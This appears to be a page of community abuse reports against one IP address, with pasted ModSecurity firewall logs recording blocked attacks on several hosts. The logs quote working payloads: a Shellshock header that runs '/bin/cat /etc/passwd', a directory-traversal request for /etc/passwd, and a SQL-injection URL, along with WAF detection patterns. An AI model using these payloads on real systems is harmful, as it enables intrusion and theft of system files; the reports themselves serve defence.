|
๐ฒ๐พ
Rizzy
|
|
Multiple WAF Violations
|
Brute-Force
Web App Attack
|
|
|
๐ฉ๐ช
Globol1312
|
|
multiple ips intrustions detected
|
Hacking
|
|
|
๐บ๐ธ
TPI-Abuse
|
|
(mod_security) mod_security (id:221260) triggered by 95.179.250.26 (95.179.250.26.vultrusercontent.c ...
show more
(mod_security) mod_security (id:221260) triggered by 95.179.250.26 (95.179.250.26.vultrusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Jun 26 10:24:19.968789 2025] [security2:error] [pid 1591173:tid 1591173] [client 95.179.250.26:60842] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||autodiscover.ggaccounting.services|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.ggaccounting.services"] [uri "/debug.cgi"] [unique_id "aF1YExIKIylCEEZe9NwFCwAAAAs"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
|
Brute-Force
Bad Web Bot
Web App Attack
|
|
|
๐บ๐ธ
TPI-Abuse
|
|
(mod_security) mod_security (id:221260) triggered by 95.179.250.26 (95.179.250.26.vultrusercontent.c ...
show more
(mod_security) mod_security (id:221260) triggered by 95.179.250.26 (95.179.250.26.vultrusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Jun 26 09:30:55.889616 2025] [security2:error] [pid 1339265:tid 1339265] [client 95.179.250.26:54066] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||autodiscover.evolute.io|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.evolute.io"] [uri "/cgi-bin/status"] [unique_id "aF1Lj-MnR9goeQKRHnGdAgAAAC4"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
|
Brute-Force
Bad Web Bot
Web App Attack
|
|
|
๐ต๐ฑ
Cyb3rWarH0G
|
|
Multiple CVE for example:
CVE-2014-3704 Drupal SQLi attempt URLENCODE
EXPLOIT Apache Struts 2 REST ...
show more
Multiple CVE for example:
CVE-2014-3704 Drupal SQLi attempt URLENCODE
EXPLOIT Apache Struts 2 REST Plugin XStream RCE (ProcessBuilder)
show less
|
Hacking
SQL Injection
Bad Web Bot
Exploited Host
Web App Attack
|
|
|
๐ฉ๐ช
dpsbs
|
|
multiple ips intrustions detected
|
Hacking
|
|
|
๐บ๐ธ
TPI-Abuse
|
|
(mod_security) mod_security (id:221260) triggered by 95.179.250.26 (95.179.250.26.vultrusercontent.c ...
show more
(mod_security) mod_security (id:221260) triggered by 95.179.250.26 (95.179.250.26.vultrusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Jun 26 07:32:59.981418 2025] [security2:error] [pid 1451820:tid 1451820] [client 95.179.250.26:41578] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||autodiscover.commonground-adr.org|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.commonground-adr.org"] [uri "/cgi-bin/status/status.cgi"] [unique_id "aF0v6yOFKZI5ahlE1IvCdwAAAAw"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
|
Brute-Force
Bad Web Bot
Web App Attack
|
|
|
๐บ๐ธ
TPI-Abuse
|
|
(mod_security) mod_security (id:211190) triggered by 95.179.250.26 (95.179.250.26.vultrusercontent.c ...
show more
(mod_security) mod_security (id:211190) triggered by 95.179.250.26 (95.179.250.26.vultrusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Jun 26 06:20:53.170856 2025] [security2:error] [pid 959900:tid 959968] [client 95.179.250.26:56574] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||autodiscover.bortec-corp.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.bortec-corp.com"] [uri "/vpn/user/download/client"] [unique_id "aF0fBWFHvUZHQgWd1WcsUwAAAJU"]
show less
|
Brute-Force
Bad Web Bot
Web App Attack
|
|
|
๐บ๐ธ
TPI-Abuse
|
|
(mod_security) mod_security (id:211190) triggered by 95.179.250.26 (95.179.250.26.vultrusercontent.c ...
show more
(mod_security) mod_security (id:211190) triggered by 95.179.250.26 (95.179.250.26.vultrusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Jun 26 05:41:31.571331 2025] [security2:error] [pid 1512854:tid 1512854] [client 95.179.250.26:46360] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||autodiscover.barigby.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.barigby.com"] [uri "/vpn/user/download/client"] [unique_id "aF0Vy-Egc6HnjB_obxq2IgAAAAo"]
show less
|
Brute-Force
Bad Web Bot
Web App Attack
|
|
|
Anonymous
|
|
Ports: 80,443; Direction: 0; Trigger: LF_CUSTOMTRIGGER
|
Brute-Force
SSH
|
|
|
๐บ๐ธ
TPI-Abuse
|
|
(mod_security) mod_security (id:217200) triggered by 95.179.250.26 (95.179.250.26.vultrusercontent.c ...
show more
(mod_security) mod_security (id:217200) triggered by 95.179.250.26 (95.179.250.26.vultrusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Jun 26 03:13:48.925865 2025] [security2:error] [pid 1470898:tid 1470898] [client 95.179.250.26:57558] ModSecurity: Access denied with code 403 (phase 1). Match of "endsWith /wp-cron.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/12_HTTP_Protocol.conf"] [line "103"] [id "217200"] [rev "2"] [msg "COMODO WAF: HTTP/1.1 POST request missing Content-Length Header||autodiscover.armorcorp.com|F|2"] [data "/guest_auth/guestisup.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] [hostname "autodiscover.armorcorp.com"] [uri "/guest_auth/guestIsUp.php"] [unique_id "aFzzLJJJ_hEAZNjphHK_EwAAAAA"]
show less
|
Brute-Force
Bad Web Bot
Web App Attack
|
|
|
๐ณ๐ฑ
BlueWire Hosting
|
|
Probing with SQL injection
|
SQL Injection
Web App Attack
|
|
|
Anonymous
|
|
Aggressive web scan
|
Web App Attack
|
|
|
Anonymous
|
|
95.179.250.26 - - [26/Jun/2025:03:28:23 +0200] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UN ...
show more
95.179.250.26 - - [26/Jun/2025:03:28:23 +0200] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1" 403 5459 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
95.179.250.26 - - [26/Jun/2025:03:32:26 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 403 5459 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
95.179.250.26 - - [26/Jun/2025:03:32:27 +0200] "GET /cgi-bin/stats HTTP/1.1" 403 5459 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
95.179.250.26 - - [26/Jun/2025:03:32:27 +0200] "GET / HTTP/1.1" 403 5459 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (CentOS; Linux i686; rv:130.0) Gecko/20100101
...
show less
|
Bad Web Bot
|
|
|
๐จ๐ฟ
Countryman
|
|
IPS detection: Apache.Axis2.Default.Password.Access
|
Hacking
|
|